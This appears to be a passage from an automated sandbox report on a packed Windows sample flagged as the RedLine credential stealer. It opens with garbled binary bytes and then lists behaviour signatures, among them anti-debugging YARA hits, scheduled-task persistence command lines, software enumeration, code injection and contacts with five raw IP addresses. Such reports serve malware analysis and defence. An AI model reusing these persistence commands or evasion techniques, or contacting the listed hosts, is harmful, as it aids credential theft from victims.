u7þýßH:Ju&þþÎH:Juþÿ½@:B±E0Guü;øõþÿÿ3ÿUþr/MèFÁþrIüÆ#+ÁÀüøVQè UÄEør'HÂùrRüÁ#+ÂÀüøw`QRèÏÄU4ÇEÇEÆEúr3M BÁúrIüÂ#+ÁÀüøwë uüGéWÿÿÿRQèÄÇ_^[å]Ãè Eè«ÌÌÌÌÌÌÌÌÌÌÌUìQS]Vñ]üWjhÀ>ÇFÇFÆèD3ÿÛ~1}ECE8S¿C ú¶È¶ÃGÈ¶ÁÎPèG;}ü\|ÏUúr(MBÁúrIüÂ#+ÁÀüøwRQèÑÄ_Æ^[å]ÃèïDÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìì0VWj$hÄ>MÐÇEàÇEäÆEÐèEÀu3öéÇ3ÿÀ¸ÇEøÇEüÆEè;ÇF+Ç¹;ÁBÈ}ECEQÇMèPèBìEÐÌPètìEèôìÌPèaÎèªþÿÿÄè¢üÿÿUüÄ0Àúr,MèBÁúrIüÂ#+ÁÀüø¹RQèÇÄEG;øHÿÿÿ¾Uäúr(MÐBÁúrIüÂ#+ÁÀüøwxRQèÄUúr^MBÁúrFIüÂ#+ÁÀüøwHë4úr(MèBÁúrIüÂ#+ÁÀüøw#RQè1Ä3öétÿÿÿRQè Ä_Æ^å]Ãè?CèJÌÌÌÌÌÌÌÌÌÌUìQEUMVÀS@WPè] ÄM}ØÓCM+ÑID ÿÀuóóNFÀuù+ñFVjÿðVøSWÿðPèÇ5ÄWÿðjÿñÿñWjÿñÿ ñUM_[^úr%BÁúrIüÂ#+ÁÀüøwRQèAÄå]ÃèdBÌÌÌÌUìì$SVWùjÇGÇGÆÿñÀj ÿ$ñØ]üÛlSÿðEôÀSjjjjjÿPjhéýÿððuøö.WN;ÊwOÇrÆëFGÙ+Ú+Â;Øw%ÇOrS4jVèE,ÆÄuøëQSÆEøÏÿuøSè¨]üÇrjjVPjÿÿuô request_handle: 0x00cc000c	1	1

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x00115200', u'virtual_address': u'0x0000c000', u'entropy': 7.964238772916435, u'name': u'.rsrc', u'virtual_size': u'0x00116000'}

entropy

7.96423877292

description

A section with a high entropy has been found

entropy

0.971516213848

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (5 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW Oct. 16, 2023, 9:44 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Oct. 16, 2023, 9:44 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Oct. 16, 2023, 9:45 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Oct. 16, 2023, 9:45 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Oct. 16, 2023, 9:45 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Yara rule detected in process memory (50 out of 96 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Take ScreenShot	rule	ScreenShot
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	RedLine stealer	rule	RedLine_Stealer_m_Zero
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored

Queries for potentially installed applications (50 out of 204 events)

Time & API	Arguments	Status
RegOpenKeyExW Oct. 16, 2023, 9:44 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x000004f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExW Oct. 16, 2023, 9:44 a.m.	regkey_r: 7-Zip base_handle: 0x000004f0 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip	1
RegOpenKeyExW Oct. 16, 2023, 9:44 a.m.	regkey_r: AddressBook base_handle: 0x000004f0 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1
RegOpenKeyExW Oct. 16, 2023, 9:44 a.m.	regkey_r: Adobe AIR base_handle: 0x000004f0 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR	1
RegOpenKeyExW Oct. 16, 2023, 9:44 a.m.	regkey_r: Connection Manager base_handle: 0x000004f0 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1
RegOpenKeyExW Oct. 16, 2023, 9:44 a.m.	regkey_r: DirectDrawEx base_handle: 0x000004f0 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1
RegOpenKeyExW Oct. 16, 2023, 9:44 a.m.	regkey_r: EditPlus base_handle: 0x000004f0 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1
RegOpenKeyExW Oct. 16, 2023, 9:44 a.m.	regkey_r: Fontcore base_handle: 0x000004f0 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1
RegOpenKeyExW Oct. 16, 2023, 9:44 a.m.	regkey_r: Google Chrome base_handle: 0x000004f0 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1
RegOpenKeyExW Oct. 16, 2023, 9:44 a.m.	regkey_r: Haansoft HWord 80 Korean base_handle: 0x000004f0 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1
RegOpenKeyExW Oct. 16, 2023, 9:44 a.m.	regkey_r: IE40 base_handle: 0x000004f0 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1
RegOpenKeyExW Oct. 16, 2023, 9:44 a.m.	regkey_r: IE4Data base_handle: 0x000004f0 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	1
RegOpenKeyExW Oct. 16, 2023, 9:44 a.m.	regkey_r: IE5BAKEX base_handle: 0x000004f0 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX	1
RegOpenKeyExW Oct. 16, 2023, 9:44 a.m.	regkey_r: IEData base_handle: 0x000004f0 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData	1
RegOpenKeyExW Oct. 16, 2023, 9:44 a.m.	regkey_r: MobileOptionPack base_handle: 0x000004f0 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack	1
RegOpenKeyExW Oct. 16, 2023, 9:44 a.m.	regkey_r: Mozilla Thunderbird 78.4.0 (x86 ko) base_handle: 0x000004f0 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)	1
RegOpenKeyExW Oct. 16, 2023, 9:44 a.m.	regkey_r: Office15.PROPLUSR base_handle: 0x000004f0 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR	1
RegOpenKeyExW Oct. 16, 2023, 9:44 a.m.	regkey_r: SchedulingAgent base_handle: 0x000004f0 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent	1
RegOpenKeyExW Oct. 16, 2023, 9:44 a.m.	regkey_r: WIC base_handle: 0x000004f0 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC	1
RegOpenKeyExW Oct. 16, 2023, 9:44 a.m.	regkey_r: {00203668-8170-44A0-BE44-B632FA4D780F} base_handle: 0x000004f0 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}	1
RegOpenKeyExW Oct. 16, 2023, 9:44 a.m.	regkey_r: {01B845D4-B73E-4CF7-A377-94BC7BB4F77B} base_handle: 0x000004f0 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}	1
RegOpenKeyExW Oct. 16, 2023, 9:44 a.m.	regkey_r: {1D91F7DA-F517-4727-9E62-B7EA978BE980} base_handle: 0x000004f0 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}	1
RegOpenKeyExW Oct. 16, 2023, 9:44 a.m.	regkey_r: {26A24AE4-039D-4CA4-87B4-2F32180131F0} base_handle: 0x000004f0 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}	1
RegOpenKeyExW Oct. 16, 2023, 9:44 a.m.	regkey_r: {4A03706F-666A-4037-7777-5F2748764D10} base_handle: 0x000004f0 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}	1
RegOpenKeyExW Oct. 16, 2023, 9:44 a.m.	regkey_r: {60EC980A-BDA2-4CB6-A427-B07A5498B4CA} base_handle: 0x000004f0 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}	1
RegOpenKeyExW Oct. 16, 2023, 9:44 a.m.	regkey_r: {90150000-0015-0409-0000-0000000FF1CE} base_handle: 0x000004f0 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Oct. 16, 2023, 9:44 a.m.	regkey_r: {90150000-0016-0409-0000-0000000FF1CE} base_handle: 0x000004f0 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Oct. 16, 2023, 9:44 a.m.	regkey_r: {90150000-0018-0409-0000-0000000FF1CE} base_handle: 0x000004f0 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Oct. 16, 2023, 9:44 a.m.	regkey_r: {90150000-0019-0409-0000-0000000FF1CE} base_handle: 0x000004f0 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Oct. 16, 2023, 9:44 a.m.	regkey_r: {90150000-001A-0409-0000-0000000FF1CE} base_handle: 0x000004f0 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Oct. 16, 2023, 9:44 a.m.	regkey_r: {90150000-001B-0409-0000-0000000FF1CE} base_handle: 0x000004f0 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Oct. 16, 2023, 9:44 a.m.	regkey_r: {90150000-001F-0409-0000-0000000FF1CE} base_handle: 0x000004f0 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Oct. 16, 2023, 9:44 a.m.	regkey_r: {90150000-001F-040C-0000-0000000FF1CE} base_handle: 0x000004f0 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}	1
RegOpenKeyExW Oct. 16, 2023, 9:44 a.m.	regkey_r: {90150000-001F-0C0A-0000-0000000FF1CE} base_handle: 0x000004f0 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}	1
RegOpenKeyExW Oct. 16, 2023, 9:44 a.m.	regkey_r: {90150000-002C-0409-0000-0000000FF1CE} base_handle: 0x000004f0 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Oct. 16, 2023, 9:44 a.m.	regkey_r: {90150000-0044-0409-0000-0000000FF1CE} base_handle: 0x000004f0 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Oct. 16, 2023, 9:44 a.m.	regkey_r: {90150000-006E-0409-0000-0000000FF1CE} base_handle: 0x000004f0 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Oct. 16, 2023, 9:44 a.m.	regkey_r: {90150000-0090-0409-0000-0000000FF1CE} base_handle: 0x000004f0 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Oct. 16, 2023, 9:44 a.m.	regkey_r: {90150000-00A1-0409-0000-0000000FF1CE} base_handle: 0x000004f0 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Oct. 16, 2023, 9:44 a.m.	regkey_r: {90150000-00BA-0409-0000-0000000FF1CE} base_handle: 0x000004f0 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Oct. 16, 2023, 9:44 a.m.	regkey_r: {90150000-00E1-0409-0000-0000000FF1CE} base_handle: 0x000004f0 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Oct. 16, 2023, 9:44 a.m.	regkey_r: {90150000-00E2-0409-0000-0000000FF1CE} base_handle: 0x000004f0 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Oct. 16, 2023, 9:44 a.m.	regkey_r: {90150000-0115-0409-0000-0000000FF1CE} base_handle: 0x000004f0 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Oct. 16, 2023, 9:44 a.m.	regkey_r: {90150000-0117-0409-0000-0000000FF1CE} base_handle: 0x000004f0 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Oct. 16, 2023, 9:44 a.m.	regkey_r: {90150000-012B-0409-0000-0000000FF1CE} base_handle: 0x000004f0 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Oct. 16, 2023, 9:44 a.m.	regkey_r: {91150000-0011-0000-0000-0000000FF1CE} base_handle: 0x000004f0 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}	1
RegOpenKeyExW Oct. 16, 2023, 9:44 a.m.	regkey_r: {939659F3-71D2-461F-B24D-91D05A4389B4} base_handle: 0x000004f0 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}	1
RegOpenKeyExW Oct. 16, 2023, 9:44 a.m.	regkey_r: {9B84A461-3B4C-40E2-B44F-CE22E215EE40} base_handle: 0x000004f0 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}	1
RegOpenKeyExW Oct. 16, 2023, 9:44 a.m.	regkey_r: {AC76BA86-7AD7-FFFF-7B44-AC0F074E4100} base_handle: 0x000004f0 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}	1
RegOpenKeyExW Oct. 16, 2023, 9:44 a.m.	regkey_r: {BB8B979E-E336-47E7-96BC-1031C1B94561} base_handle: 0x000004f0 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}	1

Terminates another process (16 events)

Time & API	Arguments	Status
NtTerminateProcess Oct. 16, 2023, 9:45 a.m.	status_code: 0xffffffff process_identifier: 2476 process_handle: 0x0000043c
NtTerminateProcess Oct. 16, 2023, 9:45 a.m.	status_code: 0xffffffff process_identifier: 2476 process_handle: 0x0000043c	1
NtTerminateProcess Oct. 16, 2023, 9:45 a.m.	status_code: 0xffffffff process_identifier: 2332 process_handle: 0x0000043c
NtTerminateProcess Oct. 16, 2023, 9:45 a.m.	status_code: 0xffffffff process_identifier: 2332 process_handle: 0x0000043c	1
NtTerminateProcess Oct. 16, 2023, 9:44 a.m.	status_code: 0x00000005 process_identifier: 3544 process_handle: 0x0000002c
NtTerminateProcess Oct. 16, 2023, 9:44 a.m.	status_code: 0x00000005 process_identifier: 3544 process_handle: 0x0000002c	1
NtTerminateProcess Oct. 16, 2023, 9:44 a.m.	status_code: 0x00000005 process_identifier: 3604 process_handle: 0x00000120
NtTerminateProcess Oct. 16, 2023, 9:44 a.m.	status_code: 0x00000005 process_identifier: 3604 process_handle: 0x00000120	1
NtTerminateProcess Oct. 16, 2023, 9:45 a.m.	status_code: 0xffffffff process_identifier: 3712 process_handle: 0x00000488
NtTerminateProcess Oct. 16, 2023, 9:45 a.m.	status_code: 0xffffffff process_identifier: 3712 process_handle: 0x00000488	1
NtTerminateProcess Oct. 16, 2023, 9:45 a.m.	status_code: 0xffffffff process_identifier: 3864 process_handle: 0x00000488
NtTerminateProcess Oct. 16, 2023, 9:45 a.m.	status_code: 0xffffffff process_identifier: 3864 process_handle: 0x00000488	1
NtTerminateProcess Oct. 16, 2023, 9:45 a.m.	status_code: 0xffffffff process_identifier: 3388 process_handle: 0x000004c4
NtTerminateProcess Oct. 16, 2023, 9:45 a.m.	status_code: 0xffffffff process_identifier: 3388 process_handle: 0x000004c4	1
NtTerminateProcess Oct. 16, 2023, 9:45 a.m.	status_code: 0xffffffff process_identifier: 1780 process_handle: 0x000004c4
NtTerminateProcess Oct. 16, 2023, 9:45 a.m.	status_code: 0xffffffff process_identifier: 1780 process_handle: 0x000004c4	1

Uses Windows utilities for basic Windows functionality (12 events)

cmdline	C:\Windows\sysnative\cmd /c "C:\Users\test22\AppData\Local\Temp\206F.tmp\2070.tmp\2071.bat C:\Users\test22\AppData\Local\Temp\IXP000.TMP\6lN50pn.exe"
cmdline	C:\Windows\sysnative\cmd /c "C:\Users\test22\AppData\Local\Temp\D5C4.tmp\D5C5.tmp\D5C6.bat C:\Users\test22\AppData\Local\Temp\IXP001.TMP\6Vk59qe.exe"
cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" https://accounts.google.com/
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
cmdline	/c schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\7XUI4o616d4Syjf.exe" /tn "\WindowsAppPool\7XUI4o616d4Syjf"
cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2940 CREDAT:145409
cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2940 CREDAT:79883
cmdline	"C:\Windows\sysnative\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\206F.tmp\2070.tmp\2071.bat C:\Users\test22\AppData\Local\Temp\IXP000.TMP\6lN50pn.exe"
cmdline	"C:\Windows\sysnative\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\D5C4.tmp\D5C5.tmp\D5C6.bat C:\Users\test22\AppData\Local\Temp\IXP001.TMP\6Vk59qe.exe"
cmdline	schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\7XUI4o616d4Syjf.exe" /tn "\WindowsAppPool\7XUI4o616d4Syjf"
cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2940 CREDAT:79875
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

Executes one or more WMI queries which can be used to identify virtual machines (1 event)

wmi	SELECT * FROM Win32_Processor

Communicates with host for which no DNS query was performed (5 events)

host	117.18.232.200
host	5.42.92.88
host	77.91.124.1
host	77.91.124.55
host	77.91.68.52

Allocates execute permission to another process indicative of possible code injection (8 events)

Time & API	Arguments	Status	Return
NtAllocateVirtualMemory Oct. 16, 2023, 9:44 a.m.	process_identifier: 2344 region_size: 204800 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000002c	1	0
NtAllocateVirtualMemory Oct. 16, 2023, 9:44 a.m.	process_identifier: 1700 region_size: 253952 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000002c	1	0
NtAllocateVirtualMemory Oct. 16, 2023, 9:44 a.m.	process_identifier: 3060 region_size: 36864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000002c	1	0
NtAllocateVirtualMemory Oct. 16, 2023, 9:44 a.m.	process_identifier: 3544 region_size: 204800 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000002c		3221225496
NtAllocateVirtualMemory Oct. 16, 2023, 9:44 a.m.	process_identifier: 3604 region_size: 204800 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000120		3221225496
NtAllocateVirtualMemory Oct. 16, 2023, 9:44 a.m.	process_identifier: 3668 region_size: 204800 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000128	1	0
